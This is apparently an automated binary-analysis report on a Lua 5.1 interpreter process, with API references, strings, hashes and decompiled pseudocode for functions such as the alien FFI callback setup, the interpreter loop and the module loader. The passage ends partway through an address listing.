0x00a21bc7
0x00a21bcc
0x00a21bd1
0x00a21bd6
0x00a21bd8
0x00a21bd9
0x00a21be5
0x00a21bea
0x00a21bf4
0x00a21bf6
0x00a21bf7
0x00a21bfa
0x00a21bff
0x00a21c04
0x00a21c09
0x00a21c0b
0x00a21c0c
0x00a21c18
0x00a21c1a
0x00a21c1b
0x00a21c1f
0x00a21c24
0x00a21c24
0x00a21c5a
0x00a21c5f
0x00a21c68
0x00a21c6a
0x00a21c6e
0x00a21c70
0x00a21c73
0x00a21c76
0x00a21c76
0x00a21c79
0x00a21c7b
0x00a21c7c
0x00a21c81
0x00a21c87
0x00a21c96
0x00a21c97
0x00a21c9c
0x00a21c9f
0x00a21c89
0x00a21c89
0x00a21c8b
0x00a21c8c
0x00a21c91
0x00a21c91
0x00a21ca4
0x00a21ca7
0x00a21cf5
0x00a21cf8
0x00a21ca9
0x00a21cb7
0x00a21cb9
0x00a21cbe
0x00a21cc1
0x00a21cc3
0x00a21cc8
0x00a21cc9
0x00a21cce
0x00a21cce
0x00a21cd9
0x00a21cdb
0x00a21ce0
0x00a21ce3
0x00a21ce5
0x00a21cea
0x00a21ceb
0x00a21cf0
0x00a21cf0
0x00a21ce3
0x00a21cfb
0x00a21cfd
0x00a21cfe
0x00a21d03
0x00a21d06
0x00a21d0b
0x00a21d79
0x00a21d80
0x00a21d80
0x00a21d85
0x00a21d8a
0x00a21d8a
0x00a21d8d
0x00a21d8e
0x00a21d8f
0x00a21d9e
0x00a21dab
0x00a21dae
0x00a21db1
0x00a21db4
0x00a21d80
0x00a21d0d
0x00a21d10
0x00a21d16
0x00a21d16
0x00a21d16
0x00a21d19
0x00a21d1a
0x00a21d1c
0x00a21d1d
0x00a21d22
0x00a21d27
0x00a21d2c
0x00a21d2e
0x00a21d2f
0x00a21d3e
0x00a21d43
0x00a21d48
0x00a21d4a
0x00a21d4b
0x00a21d4e
0x00a21d5d
0x00a21d5f
0x00a21d60
0x00a21d63
0x00a21d68
0x00a21d6a
0x00a21d6d
0x00a21d72
0x00a21d72
0x00a21d10
0x00a21dca
0x00a21dca
0x00a21dce
0x00a21dd3
0x00a21dd8
0x00a21dda
0x00a21ddf
0x00a21de0
0x00a21de5
0x00a21de5
0x00a21de8
0x00a21dea
0x00a21deb
0x00a21df5
0x00a21e67
0x00a21e6b
0x00a21df7
0x00a21df7
0x00a21df9
0x00a21dfa
0x00a21e04
0x00000000
0x00a21e06
0x00a21e06
0x00a21e0b
0x00a21e10
0x00a21e11
0x00a21e16
0x00a21e18
0x00a21e1a
0x00a21e1b
0x00a21e25
0x00a21e27
0x00a21e28
0x00a21e3a
0x00a21e54
0x00a21e56
0x00a21e5b
0x00a21e5c
0x00a21e61
0x00000000
0x00a21e2a
0x00a21e2a
0x00a21e39
0x00a21e39
0x00a21e28
0x00a21e04

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

lua_type.LUA5.1(?,00000002), ref: 00A21BB2
lua_getfield.LUA5.1(?,00000002,ret), ref: 00A21BC7
luaL_checkoption.LUA5.1(?,000000FF,int,00A254A8,?,00000002,ret), ref: 00A21BD9
lua_getfield.LUA5.1(?,00000002,abi,?,000000FF,int,00A254A8,?,00000002,ret), ref: 00A21BFA
luaL_checkoption.LUA5.1(?,000000FF,default,00A2532C,?,00000002,abi,?,000000FF,int,00A254A8,?,00000002,ret), ref: 00A21C0C
lua_settop.LUA5.1(?,000000FD,?,000000FF,default,00A2532C,?,00000002,abi,?,000000FF,int,00A254A8,?,00000002,ret), ref: 00A21C1F
luaL_checkoption.LUA5.1(?,00000002,int,00A254A8), ref: 00A21C36
free.MSVCR80(?), ref: 00A21C68
free.MSVCR80(?), ref: 00A21C6E
lua_type.LUA5.1(?,00000002), ref: 00A21C7C
lua_objlen.LUA5.1(?,00000002), ref: 00A21C8C
lua_gettop.LUA5.1(?), ref: 00A21C97
malloc.MSVCR80 ref: 00A21CB7
luaL_error.LUA5.1(?,alien: out of memory), ref: 00A21CC9
malloc.MSVCR80 ref: 00A21CD9
luaL_error.LUA5.1(?,alien: out of memory), ref: 00A21CEB
lua_type.LUA5.1(?,00000002), ref: 00A21CFE
lua_rawgeti.LUA5.1(?,00000002,00000001), ref: 00A21D1D
luaL_checkoption.LUA5.1(?,000000FF,int,00A254A8,?,00000002,00000001), ref: 00A21D2F
luaL_checkoption.LUA5.1(?,000000FF,int,00A254A8,?,000000FF,int,00A254A8,?,00000002,00000001), ref: 00A21D4E
lua_settop.LUA5.1(?,000000FE,?,000000FF,int,00A254A8,?,000000FF,int,00A254A8,?,00000002,00000001), ref: 00A21D63
luaL_checkoption.LUA5.1(?,00000003,int,00A254A8), ref: 00A21D8F
luaL_error.LUA5.1(?,alien: error in libffi preparation), ref: 00A21DE0
lua_touserdata.LUA5.1(?,00000001), ref: 00A21DEB
lua_getmetatable.LUA5.1(?,00000001), ref: 00A21DFA
lua_getfield.LUA5.1(?,FFFFD8F0,alien_callback), ref: 00A21E11
lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,alien_callback), ref: 00A21E1B
lua_settop.LUA5.1(?,000000FD), ref: 00A21E2A
lua_settop.LUA5.1(?,000000FD), ref: 00A21E3A
luaL_error.LUA5.1(?,alien: cannot create callback), ref: 00A21E5C

Strings

alien: out of memory, xrefs: 00A21CC3, 00A21CE5
alien: cannot create callback, xrefs: 00A21E56
alien: error in libffi preparation, xrefs: 00A21DDA
alien_function, xrefs: 00A21B69
alien_callback, xrefs: 00A21B85, 00A21E06
default, xrefs: 00A21C04
ret, xrefs: 00A21BBF
int, xrefs: 00A21BD1, 00A21C2E, 00A21D27, 00A21D43, 00A21D85
alien function or callback expected, xrefs: 00A21B9D
abi, xrefs: 00A21BE5

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkoption.$lua_settop.$L_error.lua_getfield.$lua_type.$freelua_getmetatable.lua_rawequal.lua_touserdata.malloc$lua_gettop.lua_objlen.lua_rawgeti.
String ID: abi$alien function or callback expected$alien: cannot create callback$alien: error in libffi preparation$alien: out of memory$alien_callback$alien_function$default$int$ret
API String ID: 3555972620-2429101005
Opcode ID: 3c2b7c5dc22d00abaacc66d0a959d539d2da1ab1b2ccad1c9537f107e2ae04da
Instruction ID: 61ab9e62de6b6fb095beb5e61b09e91d89082192dff16c0247f6c03bb29c64e6
Opcode Fuzzy Hash: 3c2b7c5dc22d00abaacc66d0a959d539d2da1ab1b2ccad1c9537f107e2ae04da
Instruction Fuzzy Hash: 69815AB1E44B35BBCA14AF2CFF83D6A7364BF16310B944634F40156AC1E775EA2186E1

Uniqueness

Uniqueness Score: -1.00%

Function 00401750, Relevance: 70.2, APIs: 35, Strings: 5, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00401750(int __edi, void* __esi, void* __eflags) {
				intOrPtr _v4;
				void* __ecx;
				void* __ebp;
				int _t4;
				int _t10;
				int _t11;
				intOrPtr _t12;
				struct _IO_FILE* _t17;
				intOrPtr _t22;
				int _t31;
				void* _t35;
				void* _t38;
				void* _t39;
				intOrPtr* _t40;
				void* _t41;
				void* _t45;
				void* _t46;
				struct _IO_FILE* _t62;

				_t38 = __esi;
				_t36 = __edi;
				_v4 =  *0x404018;
				 *0x404018 = 0;
				_t4 = E004015B0(__esi, _t35, __edi, __esi, _t39, __eflags);
				_t40 = __imp____iob_func;
				_t31 = _t4;
				if(_t31 == 0xffffffff) {
					L19:
					L00401F0C();
					fputs("\n",  *_t40(_t38, 0) + 0x20);
					_t10 = fflush( *_t40() + 0x20);
					 *0x404018 = _v4;
					return _t10;
				} else {
					_push(__edi);
					do {
						if(_t31 != 0) {
							L5:
							_push(0xffffffff);
							_push(_t38);
							L00401F4E();
							_t41 = _t41 + 8;
							if(_t4 != 0) {
								_push(0);
								_push(0xffffffff);
								_push(_t38);
								L00401F36();
								_t36 = _t4;
								_t46 = _t41 + 0xc;
								if(_t36 == 0) {
									_t36 = "(error object is not a string)";
								}
								_t22 =  *0x404018;
								if(_t22 != 0) {
									fprintf( *_t40(_t22) + 0x40, "%s: ");
									_t46 = _t46 + 0xc;
								}
								fprintf( *_t40(_t36) + 0x40, "%s\n");
								_t4 = fflush( *_t40() + 0x40);
								_push(0xfffffffe);
								_push(_t38);
								L00401F0C();
								_t41 = _t46 + 0x18;
							}
							if(_t31 == 0) {
								L12:
								_push(_t38);
								L00401F00();
								_t41 = _t41 + 4;
								if(_t4 > 0) {
									_push("print");
									_push(0xffffd8ee);
									_push(_t38);
									L00401EE2();
									_push(1);
									_push(_t38);
									L00401F06();
									_push(0);
									_push(0);
									_push(_t38);
									L00401F00();
									_t11 = _t4 - 1;
									_push(_t11);
									_push(_t38);
									L00401F60();
									_t41 = _t41 + 0x28;
									if(_t11 != 0) {
										_push(0);
										_push(0xffffffff);
										_push(_t38);
										L00401F36();
										_push(_t11);
										_push("error calling \'print\' (%s)");
										_push(_t38);
										L00401EF4();
										_t36 = _t11;
										_t12 =  *0x404018;
										_t45 = _t41 + 0x18;
										if(_t12 != 0) {
											fprintf( *_t40(_t12) + 0x40, "%s: ");
											_t45 = _t45 + 0xc;
										}
										fprintf( *_t40(_t36) + 0x40, "%s\n");
										_t17 =  *_t40() + 0x40;
										_t62 = _t17;
										fflush(_t17);
										_t41 = _t45 + 0x10;
									}
								}
							}
							goto L17;
						}
						L00401F00();
						_t36 = _t4;
						L00401F5A();
						L00401F06();
						__imp__signal(2, E00401030, _t38, _t36, _t38, E004010B0, _t31, _t38);
						L00401F60();
						_t31 = _t4;
						__imp__signal(2, 0, _t38, _t31, 0xffffffff, _t36);
						_push(_t36);
						_push(_t38);
						L00401F7E();
						_t41 = _t41 + 0x40;
						if(_t31 == 0) {
							goto L12;
						}
						_push(0);
						_push(2);
						_push(_t38);
						L00401ED6();
						_t41 = _t41 + 0xc;
						if(_t31 == 0) {
							goto L12;
						}
						goto L5;
						L17:
						_t4 = E004015B0(_t38, _t35, _t36, _t38, _t40, _t62);
						_t31 = _t4;
					} while (_t31 != 0xffffffff);
					goto L19;
				}
			}

0x00401750
0x00401750
0x0040175a
0x0040175e
0x00401768
0x0040176d
0x00401773
0x00401778
0x00401912
0x00401915
0x00401925
0x00401931
0x0040193f
0x00401947
0x0040177e
0x0040177e
0x00401780
0x00401782
0x004017e5
0x004017e5
0x004017e7
0x004017e8
0x004017ed
0x004017f2
0x004017f4
0x004017f6
0x004017f8
0x004017f9
0x004017fe
0x00401800
0x00401805
0x00401807
0x00401807
0x0040180c
0x00401813
0x00401821
0x00401827
0x00401827
0x00401836
0x00401842
0x00401848
0x0040184a
0x0040184b
0x00401850
0x00401850
0x00401855
0x0040185b
0x0040185b
0x0040185c
0x00401861
0x00401866
0x0040186c
0x00401871
0x00401876
0x00401877
0x0040187c
0x0040187e
0x0040187f
0x00401887
0x00401889
0x0040188b
0x0040188c
0x00401894
0x00401897
0x00401898
0x00401899
0x0040189e
0x004018a3
0x004018a5
0x004018a7
0x004018a9
0x004018aa
0x004018af
0x004018b0
0x004018b5
0x004018b6
0x004018bb
0x004018bd
0x004018c2
0x004018c7
0x004018d5
0x004018db
0x004018db
0x004018ea
0x004018f2
0x004018f2
0x004018f6
0x004018fc
0x004018fc
0x004018a3
0x00401866
0x00000000
0x00401855
0x00401785
0x00401791
0x00401793
0x0040179a
0x004017a6
0x004017b1
0x004017ba
0x004017bc
0x004017c2
0x004017c3
0x004017c4
0x004017c9
0x004017ce
0x00000000
0x00000000
0x004017d4
0x004017d6
0x004017d8
0x004017d9
0x004017de
0x004017e3
0x00000000
0x00000000
0x00000000
0x004018ff
0x00401901
0x00401906
0x00401908
0x00000000
0x00401911

APIs

Part of subcall function 004015B0: lua_settop.LUA5.1(?,00000000), ref: 004015CA

lua_gettop.LUA5.1 ref: 00401785
lua_pushcclosure.LUA5.1(?,Function_000010B0,00000000), ref: 00401793
lua_insert.LUA5.1(?,00000000,?,Function_000010B0,00000000), ref: 0040179A
signal.MSVCR80 ref: 004017A6
lua_pcall.LUA5.1(?,00000000,000000FF,00000000,?,00000000,?,Function_000010B0,00000000), ref: 004017B1
signal.MSVCR80 ref: 004017BC
lua_remove.LUA5.1(?,00000000,?,00000000,000000FF,00000000,?,00000000,?,Function_000010B0,00000000), ref: 004017C4
lua_gc.LUA5.1(?,00000002,00000000), ref: 004017D9
lua_type.LUA5.1(?,000000FF), ref: 004017E8
lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 004017F9
__iob_func.MSVCR80 ref: 0040181B
fprintf.MSVCR80 ref: 00401821
__iob_func.MSVCR80 ref: 00401830
fprintf.MSVCR80 ref: 00401836
__iob_func.MSVCR80 ref: 0040183C
fflush.MSVCR80 ref: 00401842
lua_settop.LUA5.1(?,000000FE), ref: 0040184B
lua_gettop.LUA5.1 ref: 0040185C
lua_getfield.LUA5.1(?,FFFFD8EE,print), ref: 00401877
lua_insert.LUA5.1(?,00000001,?,FFFFD8EE,print), ref: 0040187F
lua_gettop.LUA5.1(?,00000000,00000000), ref: 0040188C
lua_pcall.LUA5.1(?,-00000001,00000000), ref: 00401899
lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 004018AA
lua_pushfstring.LUA5.1(?,error calling 'print' (%s),00000000,?,000000FF,00000000), ref: 004018B6
__iob_func.MSVCR80 ref: 004018CF
fprintf.MSVCR80 ref: 004018D5
__iob_func.MSVCR80 ref: 004018E4
fprintf.MSVCR80 ref: 004018EA
__iob_func.MSVCR80 ref: 004018F0
fflush.MSVCR80 ref: 004018F6
lua_settop.LUA5.1(?,00000000), ref: 00401915
__iob_func.MSVCR80 ref: 0040191A
fputs.MSVCR80 ref: 00401925
__iob_func.MSVCR80 ref: 0040192B
fflush.MSVCR80 ref: 00401931

Strings

(error object is not a string), xrefs: 00401807
%s, xrefs: 0040182B, 004018DF
error calling 'print' (%s), xrefs: 004018B0
print, xrefs: 0040186C
%s: , xrefs: 00401816, 004018CA

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: __iob_func$fprintf$fflushlua_gettop.lua_settop.$lua_insert.lua_pcall.lua_tolstring.signal$fputslua_gc.lua_getfield.lua_pushcclosure.lua_pushfstring.lua_remove.lua_type.
String ID: %s$%s: $(error object is not a string)$error calling 'print' (%s)$print
API String ID: 3072291466-2910501928
Opcode ID: 82382bcf7c7f7a29eb67ab983bd920c80ae100ae6be382d54b9cfbc6d4e97d58
Instruction ID: db1acb59b64f700ab0564d85293d74989a5e4d03c3af61c10a03808a2e96185f
Opcode Fuzzy Hash: 82382bcf7c7f7a29eb67ab983bd920c80ae100ae6be382d54b9cfbc6d4e97d58
Instruction Fuzzy Hash: 7041ADB260121237E6103B765C4BF2B354C9F4176AF24423AFA15B52E2EE7CAB0441AE

Uniqueness

Uniqueness Score: -1.00%

Function 10016770, Relevance: 64.9, APIs: 32, Strings: 5, Instructions: 163
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E10016770(void* __ebx, void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t6;
				void* _t8;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				void* _t27;
				void* _t36;
				void* _t37;
				void* _t39;
				intOrPtr _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t51;
				void* _t57;

				_t57 = __fp0;
				_t54 = __eflags;
				_t39 = __ecx;
				_t36 = __ebx;
				_t41 = _a4;
				_t40 = E1000F4A0(__eflags, _t41, 1, 0);
				E10001160(_t41, 1);
				E10001B90(_t39, _t54, _t41, 0xffffd8f0, "_LOADED");
				E10001B90(_t39, _t54, _t41, 2, _t2);
				_t6 = E100016C0(_t54, _t41, 0xffffffff);
				_t43 = _t42 + 0x34;
				_t55 = _t6;
				if(_t6 == 0) {
					E10001B90(_t39, __eflags, _t41, 0xffffd8ef, "loaders");
					_t8 = E10001410(__eflags, _t41, 0xffffffff);
					_t44 = _t43 + 0x14;
					__eflags = _t8 - 5;
					if(_t8 != 5) {
						_push("\'package.loaders\' must be a table");
						_push(_t41);
						E1000F230();
						_t44 = _t44 + 8;
					}
					_push(_t36);
					E10001930(_t41, 0x1001ab10, 0);
					_t45 = _t44 + 0xc;
					_t37 = 1;
					while(1) {
						E10001C30(__eflags, _t57, _t41, 0xfffffffe, _t37);
						_t11 = E10001410(__eflags, _t41, 0xffffffff);
						_t46 = _t45 + 0x14;
						__eflags = _t11;
						if(__eflags == 0) {
							_push(E100016F0(__eflags, _t41, 0xfffffffe, _t11));
							E1000F230(_t41, "module \'%s\' not found:%s", _t40);
							_t46 = _t46 + 0x1c;
						}
						E10001980(_t39, _t41, _t40);
						E10002070(_t41, 1, 1);
						_t14 = E10001410(__eflags, _t41, 0xffffffff);
						_t47 = _t46 + 0x1c;
						__eflags = _t14 - 6;
						if(__eflags == 0) {
							break;
						}
						_t27 = E100014D0(__eflags, _t41, 0xffffffff);
						_t51 = _t47 + 8;
						__eflags = _t27;
						if(_t27 == 0) {
							E10001160(_t41, 0xfffffffe);
							_t45 = _t51 + 8;
							_t37 = _t37 + 1;
						} else {
							E100023C0(_t41, 2);
							_t45 = _t51 + 8;
							_t37 = _t37 + 1;
						}
					}
					E10001B10(_t41, 0x10017a38);
					E10001DD0(_t39, __eflags, _t41, 2, _t40);
					E10001980(_t39, _t41, _t40);
					E10002070(_t41, 1, 1);
					_t19 = E10001410(__eflags, _t41, 0xffffffff);
					_t48 = _t47 + 0x30;
					__eflags = _t19;
					if(__eflags != 0) {
						E10001DD0(_t39, __eflags, _t41, 2, _t40);
						_t48 = _t48 + 0xc;
					}
					E10001B90(_t39, __eflags, _t41, 2, _t40);
					_t21 = E10001810(__eflags, _t41, 0xffffffff);
					__eflags = _t21 - 0x10017a38;
					if(_t21 == 0x10017a38) {
						E10001AE0(_t41, 1);
						E100013D0(__eflags, _t41, 0xffffffff);
						E10001DD0(_t39, __eflags, _t41, 2, _t40);
					}
					goto L16;
				} else {
					if(E10001810(_t55, _t41, 0xffffffff) != 0x10017a38) {
						L16:
						return 1;
					} else {
						E1000F230(_t41, "loop or previous error loading module \'%s\'", _t40);
						return 1;
					}
				}
			}

0x10016770
0x10016770
0x10016770
0x10016770
0x10016771
0x10016783
0x10016785
0x10016795
0x1001679e
0x100167a6
0x100167ab
0x100167ae
0x100167b0
0x100167ea
0x100167f2
0x100167f7
0x100167fa
0x100167fd
0x100167ff
0x10016804
0x10016805
0x1001680a
0x1001680a
0x1001680d
0x10016816
0x1001681b
0x1001681e
0x10016823
0x10016827
0x1001682f
0x10016834
0x10016837
0x10016839
0x10016844
0x1001684c
0x10016851
0x10016851
0x10016856
0x10016860
0x10016868
0x1001686d
0x10016870
0x10016873
0x00000000
0x00000000
0x10016878
0x1001687d
0x10016880
0x10016882
0x10016895
0x1001689a
0x1001689d
0x10016884
0x10016887
0x1001688c
0x1001688f
0x1001688f
0x10016882
0x100168a6
0x100168af
0x100168b6
0x100168c0
0x100168c8
0x100168cd
0x100168d0
0x100168d3
0x100168d9
0x100168de
0x100168de
0x100168e5
0x100168ed
0x100168f5
0x100168fa
0x100168ff
0x10016907
0x10016910
0x10016915
0x00000000
0x100167b2
0x100167c2
0x10016919
0x1001691f
0x100167c8
0x100167cf
0x100167de
0x100167de
0x100167c2

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 1001677B

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

lua_settop.LUA5.1(?,00000001,?,00000001,00000000), ref: 10016785
lua_getfield.LUA5.1(?,FFFFD8F0,_LOADED,?,00000001,?,00000001,00000000), ref: 10016795

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_getfield.LUA5.1(?,00000002,00000000,?,FFFFD8F0,_LOADED,?,00000001,?,00000001,00000000), ref: 1001679E
lua_toboolean.LUA5.1(?,000000FF,?,00000002,00000000,?,FFFFD8F0,_LOADED,?,00000001,?,00000001,00000000), ref: 100167A6
lua_touserdata.LUA5.1(?,000000FF), ref: 100167B5
luaL_error.LUA5.1(?,loop or previous error loading module '%s',00000000), ref: 100167CF

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

lua_getfield.LUA5.1(?,FFFFD8EF,loaders), ref: 100167EA
lua_type.LUA5.1(?,000000FF,?,FFFFD8EF,loaders), ref: 100167F2
luaL_error.LUA5.1(?,'package.loaders' must be a table), ref: 10016805
lua_pushlstring.LUA5.1(?,1001AB10,00000000), ref: 10016816
lua_rawgeti.LUA5.1(?,000000FE,00000001), ref: 10016827
lua_type.LUA5.1(?,000000FF,?,000000FE,00000001), ref: 1001682F
lua_tolstring.LUA5.1(?,000000FE,00000000), ref: 1001683F
luaL_error.LUA5.1(?,module '%s' not found:%s,00000000,00000000,?,000000FE,00000000), ref: 1001684C
lua_pushstring.LUA5.1(?,00000000), ref: 10016856
lua_call.LUA5.1(?,00000001,00000001,?,00000000), ref: 10016860
lua_type.LUA5.1(?,000000FF,?,00000001,00000001,?,00000000), ref: 10016868
lua_isstring.LUA5.1(?,000000FF), ref: 10016878
lua_concat.LUA5.1(?,00000002), ref: 10016887
lua_settop.LUA5.1(?,000000FE), ref: 10016895
lua_pushlightuserdata.LUA5.1(?,10017A38), ref: 100168A6
lua_setfield.LUA5.1(?,00000002,00000000,?,10017A38), ref: 100168AF
lua_pushstring.LUA5.1(?,00000000,?,00000002,00000000,?,10017A38), ref: 100168B6
lua_call.LUA5.1(?,00000001,00000001,?,00000000,?,00000002,00000000,?,10017A38), ref: 100168C0
lua_type.LUA5.1(?,000000FF,?,00000001,00000001,?,00000000,?,00000002,00000000,?,10017A38), ref: 100168C8
lua_setfield.LUA5.1(?,00000002,00000000), ref: 100168D9

Strings

_LOADED, xrefs: 1001678A
loaders, xrefs: 100167DF
loop or previous error loading module '%s', xrefs: 100167C9
'package.loaders' must be a table, xrefs: 100167FF
module '%s' not found:%s, xrefs: 10016846

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_error.lua_getfield.$lua_call.lua_concat.lua_pushstring.lua_setfield.lua_settop.lua_tolstring.$L_checklstring.L_where.S_newlstr.lua_error.lua_isstring.lua_pushlightuserdata.lua_pushlstring.lua_pushvfstring.lua_rawgeti.lua_toboolean.lua_touserdata.
String ID: 'package.loaders' must be a table$_LOADED$loaders$loop or previous error loading module '%s'$module '%s' not found:%s
API String ID: 1305068654-732368299
Opcode ID: 1feaf27350bbdac3550f7facbe34b9ded3384ca3478fbaf569d0af5fc44109c8
Instruction ID: 45f1964f4bcdee0d6963cc1e3054e467d29309837b43f82072be3de9277cad9e
Opcode Fuzzy Hash: 1feaf27350bbdac3550f7facbe34b9ded3384ca3478fbaf569d0af5fc44109c8
Instruction Fuzzy Hash: C341066995A56131F822A1292C43FDF204DCF937F8F650324FA24781DBAE59B7C240FA

Uniqueness

Uniqueness Score: -1.00%

Function 100113C0, Relevance: 61.5, APIs: 20, Strings: 15, Instructions: 216
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E100113C0(void* __ebp, void* __eflags, void* __fp0, char _a4) {
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __esi;
				void* _t24;
				void* _t25;
				char* _t35;
				char* _t37;
				char* _t38;
				char* _t39;
				char* _t40;
				char* _t41;
				char* _t42;
				void* _t61;
				void* _t64;
				char* _t82;
				void* _t84;
				void* _t88;
				void* _t89;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;

				_t106 = __fp0;
				_t84 = __ebp;
				_t83 = _a4;
				_t64 = E10011630(__eflags, _a4,  &_a4);
				_t82 = E1000F4E0(_a4 + 2, __eflags, _a4, _a4 + 2, "flnSu", 0);
				_t24 = E10001490(__eflags, __fp0, _a4, _a4 + 1);
				_t88 =  &_v100 + 0x20;
				_t104 = _t24;
				if(_t24 == 0) {
					_t25 = E10001410(__eflags, _t83, _a4 + 1);
					_t89 = _t88 + 8;
					__eflags = _t25 - 6;
					if(_t25 != 6) {
						__eflags = _a4 + 1;
						return E1000F090(_t64, _t83, _a4 + 1, _t83, _a4 + 1, "function or level expected");
					} else {
						E100019F0(_t83, ">%s", _t82);
						_t82 = E100016F0(__eflags, _t83, 0xffffffff, 0);
						__eflags = _a4 + 1;
						E100013D0(_a4 + 1, _t83, _a4 + 1);
						E10001090(_t83, _t64, 1);
						_t91 = _t89 + 0x2c;
						goto L5;
					}
				} else {
					_t61 = E10003F40(_t64, E10001670(_t104, __fp0, _t83, _a4 + 1),  &_v100);
					_t91 = _t88 + 0x14;
					if(_t61 != 0) {
						L5:
						_t35 = E10004130(_t64, _t82,  &_v100);
						_t92 = _t91 + 0xc;
						__eflags = _t35;
						if(_t35 != 0) {
							_push(_t84);
							E10001C70(_t83, 0, 2);
							_t37 = strchr(_t82, 0x53);
							_t93 = _t92 + 0x14;
							__eflags = _t37;
							if(_t37 != 0) {
								E10011600( &_v100, _t83, "source", _v84);
								E10011600( &_v64, _t83, "short_src",  &_v64);
								E10013960(_t106, _t83, "linedefined", _v72);
								E10013960(_t106, _t83, "lastlinedefined", _v68);
								E10011600(_v88, _t83, "what", _v88);
								_t93 = _t93 + 0x3c;
							}
							_t38 = strchr(_t82, 0x6c);
							_t94 = _t93 + 8;
							__eflags = _t38;
							if(_t38 != 0) {
								E10013960(_t106, _t83, "currentline", _v80);
								_t94 = _t94 + 0xc;
							}
							_t39 = strchr(_t82, 0x75);
							_t95 = _t94 + 8;
							__eflags = _t39;
							if(_t39 != 0) {
								E10013960(_t106, _t83, "nups", _v76);
								_t95 = _t95 + 0xc;
							}
							_t40 = strchr(_t82, 0x6e);
							_t96 = _t95 + 8;
							__eflags = _t40;
							if(_t40 != 0) {
								E10011600(_v96, _t83, "name", _v96);
								E10011600(_v96, _t83, "namewhat", _v92);
								_t96 = _t96 + 0x18;
							}
							_t41 = strchr(_t82, 0x4c);
							_t97 = _t96 + 8;
							__eflags = _t41;
							if(_t41 != 0) {
								E10011670(_t83, _t64, "activelines");
								_t97 = _t97 + 0xc;
							}
							_t42 = strchr(_t82, 0x66);
							__eflags = _t42;
							if(_t42 != 0) {
								E10011670(_t83, _t64, "func");
							}
							return 1;
						} else {
							__eflags = _a4 + 2;
							return E1000F090(_t64, _t83, _a4 + 2, _t83, _a4 + 2, "invalid option");
						}
					} else {
						E100018C0(_t83);
						return 1;
					}
				}
			}

0x100113c0
0x100113c0
0x100113c9
0x100113e5
0x100113f3
0x100113f8
0x100113fd
0x10011400
0x10011402
0x10011442
0x10011447
0x1001144a
0x1001144d
0x100115df
0x100115f0
0x10011453
0x1001145a
0x10011469
0x10011472
0x10011475
0x1001147e
0x10011483
0x00000000
0x10011483
0x10011404
0x1001141a
0x1001141f
0x10011424
0x10011486
0x1001148d
0x10011492
0x10011495
0x10011497
0x100114b6
0x100114bc
0x100114ca
0x100114cc
0x100114cf
0x100114d1
0x100114de
0x100114ee
0x100114fe
0x1001150e
0x1001151e
0x10011523
0x10011523
0x10011529
0x1001152b
0x1001152e
0x10011530
0x1001153d
0x10011542
0x10011542
0x10011548
0x1001154a
0x1001154d
0x1001154f
0x1001155c
0x10011561
0x10011561
0x10011567
0x10011569
0x1001156c
0x1001156e
